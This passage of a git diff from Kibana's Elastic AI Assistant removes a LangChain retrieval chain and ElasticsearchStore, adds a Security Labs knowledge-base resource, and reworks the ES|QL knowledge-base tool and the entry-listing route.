-  // Create a chain that uses the ELSER backed ElasticsearchStore, override k=10 for esql query generation for now
-  const chain = RetrievalQAChain.fromLLM(createLlmInstance(), esStore.asRetriever(10));
-
-  // Fetch any applicable tools that the source plugin may have registered
-  const assistantToolParams: AssistantToolParams = {
-    alertsIndexPattern,
-    anonymizationFields,
-    chain,
-    esClient,
-    isEnabledKnowledgeBase: true,
-    logger,
-    modelExists,
-    onNewReplacements,
-    replacements,
-    request,
-    size,
-  };
-
-  const tools: ToolInterface[] = assistantTools.flatMap(
-    (tool) => tool.getTool({ ...assistantToolParams, llm: createLlmInstance() }) ?? []
-  );
-
-  logger.debug(
-    () => `applicable tools: ${JSON.stringify(tools.map((t) => t.name).join(', '), null, 2)}`
-  );
-
-  const executorArgs = {
-    memory,
-    verbose: false,
-    handleParsingErrors: 'Try again, paying close attention to the allowed tool input',
-  };
-  // isOpenAI check is not on agentType alone because typescript doesn't like
-  const executor = isOpenAI
-    ? await initializeAgentExecutorWithOptions(tools, createLlmInstance(), {
-        agentType: 'openai-functions',
-        ...executorArgs,
-      })
-    : llmType === 'bedrock' && bedrockChatEnabled
-    ? new lcAgentExecutor({
-        agent: await createToolCallingAgent({
-          llm: createLlmInstance(),
-          tools,
-          prompt: ChatPromptTemplate.fromMessages([
-            ['system', 'You are a helpful assistant'],
-            ['placeholder', '{chat_history}'],
-            ['human', '{input}'],
-            ['placeholder', '{agent_scratchpad}'],
-          ]),
-          streamRunnable: isStream,
-        }),
-        tools,
-      })
-    : await initializeAgentExecutorWithOptions(tools, createLlmInstance(), {
-        agentType: 'structured-chat-zero-shot-react-description',
-        ...executorArgs,
-        returnIntermediateSteps: false,
-        agentArgs: {
-          // this is important to help LangChain correctly format tool input
-          humanMessageTemplate: `Remember, when you have enough information, always prefix your final JSON output with "Final Answer:"\n\nQuestion: {input}\n\n{agent_scratchpad}.`,
-          memoryPrompts: [new MessagesPlaceholder('chat_history')],
-          suffix:
-            'Begin! Reminder to ALWAYS use the above format, and to use tools if appropriate.',
-        },
-      });
-
-  // Sets up tracer for tracing executions to APM. See x-pack/plugins/elastic_assistant/server/lib/langchain/tracers/README.mdx
-  // If LangSmith env vars are set, executions will be traced there as well. See https://docs.smith.langchain.com/tracing
-  const apmTracer = new APMTracer({ projectName: traceOptions?.projectName ?? 'default' }, logger);
-
-  let traceData;
-  if (isStream) {
-    let streamingSpan: Span | undefined;
-    if (agent.isStarted()) {
-      streamingSpan = agent.startSpan(`${DEFAULT_AGENT_EXECUTOR_ID} (Streaming)`) ?? undefined;
-    }
-    const {
-      end: streamEnd,
-      push,
-      responseWithHeaders,
-    } = streamFactory<{ type: string; payload: string }>(request.headers, logger, false, false);
-
-    let didEnd = false;
-
-    const handleStreamEnd = (finalResponse: string, isError = false) => {
-      if (onLlmResponse) {
-        onLlmResponse(
-          finalResponse,
-          {
-            transactionId: streamingSpan?.transaction?.ids?.['transaction.id'],
-            traceId: streamingSpan?.ids?.['trace.id'],
-          },
-          isError
-        ).catch(() => {});
-      }
-      streamEnd();
-      didEnd = true;
-      if ((streamingSpan && !streamingSpan?.outcome) || streamingSpan?.outcome === 'unknown') {
-        streamingSpan.outcome = 'success';
-      }
-      streamingSpan?.end();
-    };
-
-    let message = '';
-    let tokenParentRunId = '';
-
-    executor
-      .invoke(
-        {
-          input: latestMessage[0].content,
-          chat_history: [],
-          signal: abortSignal,
-        },
-        {
-          callbacks: [
-            {
-              handleLLMNewToken(payload, _idx, _runId, parentRunId) {
-                if (tokenParentRunId.length === 0 && !!parentRunId) {
-                  // set the parent run id as the parentRunId of the first token
-                  // this is used to ensure that all tokens in the stream are from the same run
-                  // filtering out runs that are inside e.g. tool calls
-                  tokenParentRunId = parentRunId;
-                }
-                if (payload.length && !didEnd && tokenParentRunId === parentRunId) {
-                  push({ payload, type: 'content' });
-                  // store message in case of error
-                  message += payload;
-                }
-              },
-              handleChainEnd(outputs, runId, parentRunId) {
-                // if parentRunId is undefined, this is the end of the stream
-                if (!parentRunId) {
-                  handleStreamEnd(outputs.output);
-                }
-              },
-            },
-            apmTracer,
-            ...(traceOptions?.tracers ?? []),
-          ],
-          runName: DEFAULT_AGENT_EXECUTOR_ID,
-          tags: traceOptions?.tags ?? [],
-        }
-      )
-      .catch((err) => {
-        // if I throw an error here, it crashes the server. Not sure how to get around that.
-        // If I put await on this function the error works properly, but when there is not an error
-        // it waits for the entire stream to complete before resolving
-        const error = transformError(err);
-
-        if (error.message === 'AbortError') {
-          // user aborted the stream, we must end it manually here
-          return handleStreamEnd(message);
-        }
-        logger.error(`Error streaming from LangChain: ${error.message}`);
-        push({ payload: error.message, type: 'content' });
-        handleStreamEnd(error.message, true);
-      });
-
-    return responseWithHeaders;
-  }
-
-  // Wrap executor call with an APM span for instrumentation
-  const langChainResponse = await withAssistantSpan(DEFAULT_AGENT_EXECUTOR_ID, async (span) => {
-    if (span?.transaction?.ids['transaction.id'] != null && span?.ids['trace.id'] != null) {
-      traceData = {
-        // Transactions ID since this span is the parent
-        transaction_id: span.transaction.ids['transaction.id'],
-        trace_id: span.ids['trace.id'],
-      };
-      span.addLabels({ evaluationId: traceOptions?.evaluationId });
-    }
-
-    return executor.call(
-      { input: latestMessage[0].content },
-      {
-        callbacks: [apmTracer, ...(traceOptions?.tracers ?? [])],
-        runName: DEFAULT_AGENT_EXECUTOR_ID,
-        tags: traceOptions?.tags ?? [],
-      }
-    );
-  });
-
-  const langChainOutput = langChainResponse.output;
-  if (onLlmResponse) {
-    await onLlmResponse(langChainOutput, traceData);
-  }
-  return {
-    body: {
-      connector_id: connectorId,
-      data: langChainOutput, // the response from the actions framework
-      trace_data: traceData,
-      replacements,
-      status: 'ok',
-      conversationId,
-    },
-    headers: {
-      'content-type': 'application/json',
-    },
-  };
-};
diff --git a/x-pack/plugins/elastic_assistant/server/lib/langchain/executors/types.ts b/x-pack/plugins/elastic_assistant/server/lib/langchain/executors/types.ts
index 2395221ea14b3..2d86d05447916 100644
--- a/x-pack/plugins/elastic_assistant/server/lib/langchain/executors/types.ts
+++ b/x-pack/plugins/elastic_assistant/server/lib/langchain/executors/types.ts
@@ -17,7 +17,6 @@ import { PublicMethodsOf } from '@kbn/utility-types';
 import type { InferenceServerStart } from '@kbn/inference-plugin/server';
 import { ResponseBody } from '../types';
 import type { AssistantTool } from '../../../types';
-import { ElasticsearchStore } from '../elasticsearch_store/elasticsearch_store';
 import { AIAssistantKnowledgeBaseDataClient } from '../../../ai_assistant_data_clients/knowledge_base';
 import { AIAssistantConversationsDataClient } from '../../../ai_assistant_data_clients/conversations';
 import { AIAssistantDataClient } from '../../../ai_assistant_data_clients';
@@ -44,7 +43,6 @@ export interface AgentExecutorParams<T extends boolean> {
   conversationId?: string;
   dataClients?: AssistantDataClients;
   esClient: ElasticsearchClient;
-  esStore: ElasticsearchStore;
   langChainMessages: BaseMessage[];
   llmType?: string;
   logger: Logger;
diff --git a/x-pack/plugins/elastic_assistant/server/lib/langchain/graphs/default_assistant_graph/index.ts b/x-pack/plugins/elastic_assistant/server/lib/langchain/graphs/default_assistant_graph/index.ts
index 9b421d2d93ebc..dee23f202b3d4 100644
--- a/x-pack/plugins/elastic_assistant/server/lib/langchain/graphs/default_assistant_graph/index.ts
+++ b/x-pack/plugins/elastic_assistant/server/lib/langchain/graphs/default_assistant_graph/index.ts
@@ -6,7 +6,6 @@
  */
 
 import { StructuredTool } from '@langchain/core/tools';
-import { RetrievalQAChain } from 'langchain/chains';
 import { getDefaultArguments } from '@kbn/langchain/server';
 import {
   createOpenAIFunctionsAgent,
@@ -24,9 +23,6 @@ import { getDefaultAssistantGraph } from './graph';
 import { invokeGraph, streamGraph } from './helpers';
 import { transformESSearchToAnonymizationFields } from '../../../../ai_assistant_data_clients/anonymization_fields/helpers';
 
-/**
- * Drop in replacement for the existing `callAgentExecutor` that uses LangGraph
- */
 export const callAssistantGraph: AgentExecutor<true | false> = async ({
   abortSignal,
   actionsClient,
@@ -37,7 +33,6 @@ export const callAssistantGraph: AgentExecutor<true | false> = async ({
   conversationId,
   dataClients,
   esClient,
-  esStore,
   inference,
   langChainMessages,
   llmType,
@@ -95,9 +90,6 @@ export const callAssistantGraph: AgentExecutor<true | false> = async ({
 
   const latestMessage = langChainMessages.slice(-1); // the last message
 
-  // Create a chain that uses the ELSER backed ElasticsearchStore, override k=10 for esql query generation for now
-  const chain = RetrievalQAChain.fromLLM(createLlmInstance(), esStore.asRetriever(10));
-
   // Check if KB is available
   const isEnabledKnowledgeBase = (await dataClients?.kbDataClient?.isModelDeployed()) ?? false;
 
@@ -105,7 +97,6 @@ export const callAssistantGraph: AgentExecutor<true | false> = async ({
   const assistantToolParams: AssistantToolParams = {
     alertsIndexPattern,
     anonymizationFields,
-    chain,
     connectorId,
     esClient,
     inference,
diff --git a/x-pack/plugins/elastic_assistant/server/routes/attack_discovery/helpers.ts b/x-pack/plugins/elastic_assistant/server/routes/attack_discovery/helpers.ts
index cccf37aff48e0..2a1450a9f7b9b 100644
--- a/x-pack/plugins/elastic_assistant/server/routes/attack_discovery/helpers.ts
+++ b/x-pack/plugins/elastic_assistant/server/routes/attack_discovery/helpers.ts
@@ -153,7 +153,6 @@ const formatAssistantToolParams = ({
   alertsIndexPattern,
   anonymizationFields: [...(anonymizationFields ?? []), ...REQUIRED_FOR_ATTACK_DISCOVERY],
   isEnabledKnowledgeBase: false, // not required for attack discovery
-  chain: undefined, // not required for attack discovery
   esClient,
   langChainTimeout,
   llm,
diff --git a/x-pack/plugins/elastic_assistant/server/routes/evaluate/post_evaluate.ts b/x-pack/plugins/elastic_assistant/server/routes/evaluate/post_evaluate.ts
index 090dfa2acf5f0..c0c7bf3f6bc4e 100644
--- a/x-pack/plugins/elastic_assistant/server/routes/evaluate/post_evaluate.ts
+++ b/x-pack/plugins/elastic_assistant/server/routes/evaluate/post_evaluate.ts
@@ -29,16 +29,13 @@ import {
   createStructuredChatAgent,
   createToolCallingAgent,
 } from 'langchain/agents';
-import { RetrievalQAChain } from 'langchain/chains';
 import { buildResponse } from '../../lib/build_response';
 import { AssistantDataClients } from '../../lib/langchain/executors/types';
 import { AssistantToolParams, ElasticAssistantRequestHandlerContext, GetElser } from '../../types';
 import { DEFAULT_PLUGIN_NAME, isV2KnowledgeBaseEnabled, performChecks } from '../helpers';
-import { ESQL_RESOURCE } from '../knowledge_base/constants';
 import { fetchLangSmithDataset } from './utils';
 import { transformESSearchToAnonymizationFields } from '../../ai_assistant_data_clients/anonymization_fields/helpers';
 import { EsAnonymizationFieldsSchema } from '../../ai_assistant_data_clients/anonymization_fields/types';
-import { ElasticsearchStore } from '../../lib/langchain/elasticsearch_store/elasticsearch_store';
 import {
   DefaultAssistantGraph,
   getDefaultAssistantGraph,
@@ -88,7 +85,6 @@ export const postEvaluateRoute = (
         const assistantContext = ctx.elasticAssistant;
         const actions = ctx.elasticAssistant.actions;
         const logger = assistantContext.logger.get('evaluate');
-        const telemetry = assistantContext.telemetry;
         const abortSignal = getRequestAbortedSignal(request.events.aborted$);
         const v2KnowledgeBaseEnabled = isV2KnowledgeBaseEnabled({ context: ctx, request });
 
@@ -147,9 +143,6 @@ export const postEvaluateRoute = (
           // Get a scoped esClient for esStore + writing results to the output index
           const esClient = ctx.core.elasticsearch.client.asCurrentUser;
 
-          // Default ELSER model
-          const elserId = await getElser();
-
           const inference = ctx.elasticAssistant.inference;
 
           // Data clients
@@ -167,17 +160,6 @@ export const postEvaluateRoute = (
             kbDataClient,
           };
 
-          // esStore
-          const esStore = new ElasticsearchStore(
-            esClient,
-            kbDataClient?.indexTemplateAndPattern?.alias ?? '',
-            logger,
-            telemetry,
-            elserId,
-            ESQL_RESOURCE,
-            kbDataClient
-          );
-
           // Actions
           const actionsClient = await actions.getActionsClientWithRequest(request);
           const connectors = await actionsClient.getBulk({
@@ -221,9 +203,6 @@ export const postEvaluateRoute = (
                 ? transformESSearchToAnonymizationFields(anonymizationFieldsRes.data)
                 : undefined;
 
-              // Create a chain that uses the ELSER backed ElasticsearchStore, override k=10 for esql query generation for now
-              const chain = RetrievalQAChain.fromLLM(llm, esStore.asRetriever(10));
-
               // Check if KB is available
               const isEnabledKnowledgeBase =
                 (await dataClients.kbDataClient?.isModelDeployed()) ?? false;
@@ -249,7 +228,6 @@ export const postEvaluateRoute = (
               // Fetch any applicable tools that the source plugin may have registered
               const assistantToolParams: AssistantToolParams = {
                 anonymizationFields,
-                chain,
                 esClient,
                 isEnabledKnowledgeBase,
                 kbDataClient: dataClients?.kbDataClient,
diff --git a/x-pack/plugins/elastic_assistant/server/routes/helpers.ts b/x-pack/plugins/elastic_assistant/server/routes/helpers.ts
index 860c6882a6b27..2c0c56c73a2b3 100644
--- a/x-pack/plugins/elastic_assistant/server/routes/helpers.ts
+++ b/x-pack/plugins/elastic_assistant/server/routes/helpers.ts
@@ -34,7 +34,7 @@ import { FindResponse } from '../ai_assistant_data_clients/find';
 import { EsPromptsSchema } from '../ai_assistant_data_clients/prompts/types';
 import { AIAssistantDataClient } from '../ai_assistant_data_clients';
 import { MINIMUM_AI_ASSISTANT_LICENSE } from '../../common/constants';
-import { ESQL_DOCS_LOADED_QUERY, ESQL_RESOURCE } from './knowledge_base/constants';
+import { ESQL_DOCS_LOADED_QUERY } from './knowledge_base/constants';
 import { buildResponse, getLlmType } from './utils';
 import {
   AgentExecutorParams,
@@ -44,7 +44,6 @@ import {
 import { executeAction, StaticResponse } from '../lib/executor';
 import { getLangChainMessages } from '../lib/langchain/helpers';
 
-import { ElasticsearchStore } from '../lib/langchain/elasticsearch_store/elasticsearch_store';
 import { AIAssistantConversationsDataClient } from '../ai_assistant_data_clients/conversations';
 import { INVOKE_ASSISTANT_SUCCESS_EVENT } from '../lib/telemetry/event_based_telemetry';
 import { ElasticAssistantRequestHandlerContext, GetElser } from '../types';
@@ -381,8 +380,6 @@ export const langChainExecute = async ({
   // convert the assistant messages to LangChain messages:
   const langChainMessages = getLangChainMessages(messages);
 
-  const elserId = await getElser();
-
   const anonymizationFieldsDataClient =
     await assistantContext.getAIAssistantAnonymizationFieldsDataClient();
   const conversationsDataClient = await assistantContext.getAIAssistantConversationsDataClient();
@@ -394,15 +391,6 @@ export const langChainExecute = async ({
     })) ?? undefined;
   const bedrockChatEnabled =
     assistantContext.getRegisteredFeatures(pluginName).assistantBedrockChat;
-  const esStore = new ElasticsearchStore(
-    esClient,
-    kbDataClient?.indexTemplateAndPattern?.alias ?? '',
-    logger,
-    telemetry,
-    elserId,
-    ESQL_RESOURCE,
-    kbDataClient
-  );
 
   const dataClients: AssistantDataClients = {
     anonymizationFieldsDataClient: anonymizationFieldsDataClient ?? undefined,
@@ -421,7 +409,6 @@ export const langChainExecute = async ({
     conversationId,
     connectorId,
     esClient,
-    esStore,
     inference,
     isStream,
     llmType: getLlmType(actionTypeId),
diff --git a/x-pack/plugins/elastic_assistant/server/routes/knowledge_base/constants.ts b/x-pack/plugins/elastic_assistant/server/routes/knowledge_base/constants.ts
index 640f72089ebad..e50faf8a434e2 100644
--- a/x-pack/plugins/elastic_assistant/server/routes/knowledge_base/constants.ts
+++ b/x-pack/plugins/elastic_assistant/server/routes/knowledge_base/constants.ts
@@ -14,3 +14,4 @@ export const KNOWLEDGE_BASE_INGEST_PIPELINE = '.kibana-elastic-ai-assistant-kb-i
 export const ESQL_DOCS_LOADED_QUERY =
   'You can chain processing commands, separated by a pipe character: `|`.';
 export const ESQL_RESOURCE = 'esql';
+export const SECURITY_LABS_RESOURCE = 'security_labs';
diff --git a/x-pack/plugins/elastic_assistant/server/routes/knowledge_base/entries/find_route.ts b/x-pack/plugins/elastic_assistant/server/routes/knowledge_base/entries/find_route.ts
index b28fabedb5cef..78b7ac720dd1a 100644
--- a/x-pack/plugins/elastic_assistant/server/routes/knowledge_base/entries/find_route.ts
+++ b/x-pack/plugins/elastic_assistant/server/routes/knowledge_base/entries/find_route.ts
@@ -7,6 +7,7 @@
 
 import type { IKibanaResponse } from '@kbn/core/server';
 import { transformError } from '@kbn/securitysolution-es-utils';
+import { find } from 'lodash';
 
 import {
   API_VERSIONS,
@@ -17,6 +18,7 @@ import {
   FindKnowledgeBaseEntriesResponse,
 } from '@kbn/elastic-assistant-common';
 import { buildRouteValidationWithZod } from '@kbn/elastic-assistant-common/impl/schemas/common';
+import { estypes } from '@elastic/elasticsearch';
 import { ElasticAssistantPluginRouter } from '../../../types';
 import { buildResponse } from '../../utils';
 
@@ -24,7 +26,7 @@ import { performChecks } from '../../helpers';
 import { transformESSearchToKnowledgeBaseEntry } from '../../../ai_assistant_data_clients/knowledge_base/transforms';
 import { EsKnowledgeBaseEntrySchema } from '../../../ai_assistant_data_clients/knowledge_base/types';
 import { getKBUserFilter } from './utils';
-import { ESQL_RESOURCE } from '../constants';
+import { ESQL_RESOURCE, SECURITY_LABS_RESOURCE } from '../constants';
 
 export const findKnowledgeBaseEntriesRoute = (router: ElasticAssistantPluginRouter) => {
   router.versioned
@@ -72,11 +74,9 @@ export const findKnowledgeBaseEntriesRoute = (router: ElasticAssistantPluginRout
           });
           const currentUser = ctx.elasticAssistant.getCurrentUser();
           const userFilter = getKBUserFilter(currentUser);
-          const systemFilter = ` AND NOT kb_resource:"${ESQL_RESOURCE}"`;
+          const systemFilter = ` AND kb_resource:"user"`;
           const additionalFilter = query.filter ? ` AND ${query.filter}` : '';
 
-          // TODO: Either plumb through new `findDocuments` that takes query DSL so you can do agg + pagination to collapse
-          // TODO: system entries, use scoped esClient from request, or query them separate and mess with pagination...latter for now.
           const result = await kbDataClient?.findDocuments<EsKnowledgeBaseEntrySchema>({
             perPage: query.per_page,
             page: query.page,
@@ -84,37 +84,82 @@ export const findKnowledgeBaseEntriesRoute = (router: ElasticAssistantPluginRout
             sortOrder: query.sort_order,
             filter: `${userFilter}${systemFilter}${additionalFilter}`,
             fields: query.fields,
+            aggs: {
+              global_aggs: {
+                global: {},
+                aggs: {
+                  kb_resource_aggregation: {
+                    terms: {
+                      field: 'kb_resource',
+                      size: 10,
+                      exclude: ['user'],
+                    },
+                    aggs: {
+                      top_documents: {
+                        top_hits: {
+                          size: 1,
+                        },
+                      },
+                    },
+                  },
+                },
+              },
+            },
           });
 
-          const systemResult = await kbDataClient?.findDocuments<EsKnowledgeBaseEntrySchema>({
-            perPage: 1000,
-            page: 1,
-            filter: `kb_resource:"${ESQL_RESOURCE}"`,
-          });
+          const systemEntries = [
+            {
+              bucketId: 'esqlDocsId',
+              kbResource: ESQL_RESOURCE,
+              name: 'ES|QL documents',
+              required: true,
+            },
+            {
+              bucketId: 'securityLabsId',
+              kbResource: SECURITY_LABS_RESOURCE,
+              name: 'Security Labs',
+              required: true,
+            },
+          ]
+            .map(({ bucketId, kbResource, name, required }) => {
+              const bucket = find(
+                (
+                  (result?.data.aggregations?.global_aggs as estypes.AggregationsGlobalAggregate)
+                    ?.kb_resource_aggregation as {
+                    buckets: estypes.AggregationsBuckets;
+                  }
+                )?.buckets,
+                ['key', kbResource]
+              ) as {
+                doc_count: number;
+                top_documents: estypes.AggregationsTopHitsAggregate;
+              };
 
-          // Group system entries
-          const systemEntry = systemResult?.data.hits.hits?.[0]?._source;
-          const systemEntryCount = systemResult?.data.hits.hits?.length ?? 1;
-          const systemEntries: DocumentEntry[] =
-            systemEntry == null
-              ? []
-              : [
-                  {
-                    id: 'someID',
-                    createdAt: systemEntry.created_at,
-                    createdBy: systemEntry.created_by,
-                    updatedAt: systemEntry.updated_at,
-                    updatedBy: systemEntry.updated_by,
-                    users: [],
-                    name: 'ES|QL documents',
-                    namespace: systemEntry.namespace,
-                    type: DocumentEntryType.value,
-                    kbResource: ESQL_RESOURCE,
-                    source: '',
-                    required: true,
-                    text: `${systemEntryCount}`,
-                  },
-                ];
+              const entry = bucket?.top_documents?.hits?.hits?.[0]?._source;
+              const entryCount = bucket?.doc_count;
+              const entries: DocumentEntry[] =
+                entry == null
+                  ? []
+                  : [
+                      {
+                        id: bucketId,
+                        createdAt: entry.created_at,
+                        createdBy: entry.created_by,
+                        updatedAt: entry.updated_at,
+                        updatedBy: entry.updated_by,
+                        users: [],
+                        name,
+                        namespace: entry.namespace,
+                        type: DocumentEntryType.value,
+                        kbResource,
+                        source: '',
+                        required,
+                        text: `${entryCount}`,
+                      },
+                    ];
+              return entries;
+            })
+            .flat();
 
           if (result) {
             return response.ok({
diff --git a/x-pack/plugins/elastic_assistant/server/routes/knowledge_base/get_knowledge_base_status.ts b/x-pack/plugins/elastic_assistant/server/routes/knowledge_base/get_knowledge_base_status.ts
index a6853cdcf27b0..3e4fcbb7f404b 100644
--- a/x-pack/plugins/elastic_assistant/server/routes/knowledge_base/get_knowledge_base_status.ts
+++ b/x-pack/plugins/elastic_assistant/server/routes/knowledge_base/get_knowledge_base_status.ts
@@ -80,7 +80,14 @@ export const getKnowledgeBaseStatusRoute = (router: ElasticAssistantPluginRouter
 
           if (indexExists && isModelDeployed && kbResource === ESQL_RESOURCE) {
             const esqlExists = await kbDataClient.isESQLDocsLoaded();
-            return response.ok({ body: { ...body, esql_exists: esqlExists } });
+            const securityLabsExists = await kbDataClient.isSecurityLabsDocsLoaded();
+            return response.ok({
+              body: {
+                ...body,
+                esql_exists: esqlExists,
+                security_labs_exists: v2KnowledgeBaseEnabled ? securityLabsExists : true,
+              },
+            });
           }
 
           return response.ok({ body });
diff --git a/x-pack/plugins/elastic_assistant/server/routes/knowledge_base/post_knowledge_base.ts b/x-pack/plugins/elastic_assistant/server/routes/knowledge_base/post_knowledge_base.ts
index b72674c6ae900..b5abf30b2bf07 100644
--- a/x-pack/plugins/elastic_assistant/server/routes/knowledge_base/post_knowledge_base.ts
+++ b/x-pack/plugins/elastic_assistant/server/routes/knowledge_base/post_knowledge_base.ts
@@ -74,7 +74,11 @@ export const postKnowledgeBaseRoute = (router: ElasticAssistantPluginRouter) =>
           }
 
           const installEsqlDocs = kbResource === ESQL_RESOURCE;
-          await knowledgeBaseDataClient.setupKnowledgeBase({ soClient, installEsqlDocs });
+          await knowledgeBaseDataClient.setupKnowledgeBase({
+            soClient,
+            installEsqlDocs,
+            installSecurityLabsDocs: v2KnowledgeBaseEnabled,
+          });
 
           return response.ok({ body: { success: true } });
         } catch (error) {
diff --git a/x-pack/plugins/elastic_assistant/server/types.ts b/x-pack/plugins/elastic_assistant/server/types.ts
index e685c1d4e9358..58ee4a9dd4545 100755
--- a/x-pack/plugins/elastic_assistant/server/types.ts
+++ b/x-pack/plugins/elastic_assistant/server/types.ts
@@ -24,7 +24,6 @@ import { type MlPluginSetup } from '@kbn/ml-plugin/server';
 import { DynamicStructuredTool, Tool } from '@langchain/core/tools';
 import { SpacesPluginSetup, SpacesPluginStart } from '@kbn/spaces-plugin/server';
 import { TaskManagerSetupContract } from '@kbn/task-manager-plugin/server';
-import { RetrievalQAChain } from 'langchain/chains';
 import { ElasticsearchClient } from '@kbn/core/server';
 import {
   AttackDiscoveryPostRequestBody,
@@ -239,7 +238,6 @@ export interface AssistantToolParams {
   inference?: InferenceServerStart;
   isEnabledKnowledgeBase: boolean;
   connectorId?: string;
-  chain?: RetrievalQAChain;
   esClient: ElasticsearchClient;
   kbDataClient?: AIAssistantKnowledgeBaseDataClient;
   langChainTimeout?: number;
diff --git a/x-pack/plugins/security_solution/server/assistant/tools/esql_language_knowledge_base/esql_language_knowledge_base_tool.test.ts b/x-pack/plugins/security_solution/server/assistant/tools/esql_language_knowledge_base/esql_language_knowledge_base_tool.test.ts
index 29b10e9fb0275..7eeb11e8df37a 100644
--- a/x-pack/plugins/security_solution/server/assistant/tools/esql_language_knowledge_base/esql_language_knowledge_base_tool.test.ts
+++ b/x-pack/plugins/security_solution/server/assistant/tools/esql_language_knowledge_base/esql_language_knowledge_base_tool.test.ts
@@ -5,16 +5,16 @@
  * 2.0.
  */
 
-import type { RetrievalQAChain } from 'langchain/chains';
 import type { DynamicTool } from '@langchain/core/tools';
 import { ESQL_KNOWLEDGE_BASE_TOOL } from './esql_language_knowledge_base_tool';
 import type { ElasticsearchClient } from '@kbn/core-elasticsearch-server';
 import type { KibanaRequest } from '@kbn/core-http-server';
 import type { ExecuteConnectorRequestBody } from '@kbn/elastic-assistant-common/impl/schemas/actions_connector/post_actions_connector_execute_route.gen';
 import { loggerMock } from '@kbn/logging-mocks';
+import type { AIAssistantKnowledgeBaseDataClient } from '@kbn/elastic-assistant-plugin/server/ai_assistant_data_clients/knowledge_base';
 
 describe('EsqlLanguageKnowledgeBaseTool', () => {
-  const chain = {} as RetrievalQAChain;
+  const kbDataClient = jest.fn() as unknown as AIAssistantKnowledgeBaseDataClient;
   const esClient = {
     search: jest.fn().mockResolvedValue({}),
   } as unknown as ElasticsearchClient;
@@ -30,7 +30,7 @@ describe('EsqlLanguageKnowledgeBaseTool', () => {
   } as unknown as KibanaRequest<unknown, unknown, ExecuteConnectorRequestBody>;
   const logger = loggerMock.create();
   const rest = {
-    chain,
+    kbDataClient,
     esClient,
     logger,
     request,
diff --git a/x-pack/plugins/security_solution/server/assistant/tools/esql_language_knowledge_base/esql_language_knowledge_base_tool.ts b/x-pack/plugins/security_solution/server/assistant/tools/esql_language_knowledge_base/esql_language_knowledge_base_tool.ts
index 22fc85108ab65..908d69ab0802e 100644
--- a/x-pack/plugins/security_solution/server/assistant/tools/esql_language_knowledge_base/esql_language_knowledge_base_tool.ts
+++ b/x-pack/plugins/security_solution/server/assistant/tools/esql_language_knowledge_base/esql_language_knowledge_base_tool.ts
@@ -6,12 +6,15 @@
  */
 
 import { DynamicStructuredTool } from '@langchain/core/tools';
+import { DirectoryLoader } from 'langchain/document_loaders/fs/directory';
+import { TextLoader } from 'langchain/document_loaders/fs/text';
+import type { Document } from 'langchain/document';
+import { resolve } from 'path';
 import { z } from '@kbn/zod';
 import type { AssistantTool, AssistantToolParams } from '@kbn/elastic-assistant-plugin/server';
+import { ESQL_RESOURCE } from '@kbn/elastic-assistant-plugin/server/routes/knowledge_base/constants';
 import { APP_UI_ID } from '../../../../common';
 
-export type EsqlKnowledgeBaseToolParams = AssistantToolParams;
-
 const toolDetails = {
   description:
     'Call this for knowledge on how to build an ESQL query, or answer questions about the ES|QL query language. Input must always be the query on a single line, with no other text. Your answer will be parsed as JSON, so never use quotes within the output and instead use backticks. Do not add any additional text to describe your output.',
@@ -21,15 +24,15 @@ const toolDetails = {
 export const ESQL_KNOWLEDGE_BASE_TOOL: AssistantTool = {
   ...toolDetails,
   sourceRegister: APP_UI_ID,
-  isSupported: (params: AssistantToolParams): params is EsqlKnowledgeBaseToolParams => {
-    const { chain, isEnabledKnowledgeBase, modelExists } = params;
-    return isEnabledKnowledgeBase && modelExists && chain != null;
+  isSupported: (params: AssistantToolParams): params is AssistantToolParams => {
+    const { kbDataClient, isEnabledKnowledgeBase, modelExists } = params;
+    return isEnabledKnowledgeBase && modelExists && kbDataClient != null;
   },
   getTool(params: AssistantToolParams) {
     if (!this.isSupported(params)) return null;
 
-    const { chain } = params as EsqlKnowledgeBaseToolParams;
-    if (chain == null) return null;
+    const { kbDataClient } = params as AssistantToolParams;
+    if (kbDataClient == null) return null;
 
     return new DynamicStructuredTool({
       name: toolDetails.name,
@@ -37,14 +40,34 @@ export const ESQL_KNOWLEDGE_BASE_TOOL: AssistantTool = {
       schema: z.object({
         question: z.string().describe(`The user's exact question about ESQL`),
       }),
-      func: async (input, _, cbManager) => {
-        const result = await chain.invoke(
+      func: async (input) => {
+        const exampleQueriesLoader = new DirectoryLoader(
+          resolve(
+            __dirname,
+            '../../../../../elastic_assistant/server/knowledge_base/esql/example_queries'
+          ),
           {
-            query: input.question,
+            '.asciidoc': (path) => new TextLoader(path),
           },
-          cbManager
+          true
         );
-        return result.text;
+        const rawExampleQueries = await exampleQueriesLoader.load();
+
+        const docs = await kbDataClient.getKnowledgeBaseDocumentEntries({
+          kbResource: ESQL_RESOURCE,
+          query: input.question,
+        });
+
+        let legacyDocs: Document[] = [];
+
+        if (!kbDataClient?.isV2KnowledgeBaseEnabled) {
+          legacyDocs = await kbDataClient.getKnowledgeBaseDocumentEntries({
+            kbResource: 'unknown',
+            query: input.question,
+          });
+        }
+
+        return JSON.stringify([...rawExampleQueries, ...docs, ...legacyDocs]).substring(0, 50000);
       },
       tags: ['esql', 'query-generation', 'knowledge-base'],
       // TODO: Remove after ZodAny is fixed https://github.com/langchain-ai/langchainjs/blob/main/langchain-core/src/tools.ts
diff --git a/x-pack/plugins/security_solution/server/assistant/tools/esql_language_knowledge_base/nl_to_esql_tool.ts b/x-pack/plugins/security_solution/server/assistant/tools/esql_language_knowledge_base/nl_to_esql_tool.ts
index b5dc209043d5d..c313d877cc55b 100644
--- a/x-pack/plugins/security_solution/server/assistant/tools/esql_language_knowledge_base/nl_to_esql_tool.ts
+++ b/x-pack/plugins/security_solution/server/assistant/tools/esql_language_knowledge_base/nl_to_esql_tool.ts
@@ -36,8 +36,8 @@ export const NL_TO_ESQL_TOOL: AssistantTool = {
   ...toolDetails,
   sourceRegister: APP_UI_ID,
   isSupported: (params: ESQLToolParams): params is ESQLToolParams => {
-    const { chain, isEnabledKnowledgeBase, modelExists } = params;
-    return isEnabledKnowledgeBase && modelExists && chain != null;
+    const { inference, connectorId, isEnabledKnowledgeBase, modelExists } = params;
+    return isEnabledKnowledgeBase && modelExists && inference != null && connectorId != null;
   },
   getTool(params: ESQLToolParams) {
     if (!this.isSupported(params)) return null;
diff --git a/x-pack/plugins/security_solution/server/assistant/tools/index.test.ts b/x-pack/plugins/security_solution/server/assistant/tools/index.test.ts
index b64f34e4b6ee9..0d719adc80fe2 100644
--- a/x-pack/plugins/security_solution/server/assistant/tools/index.test.ts
+++ b/x-pack/plugins/security_solution/server/assistant/tools/index.test.ts
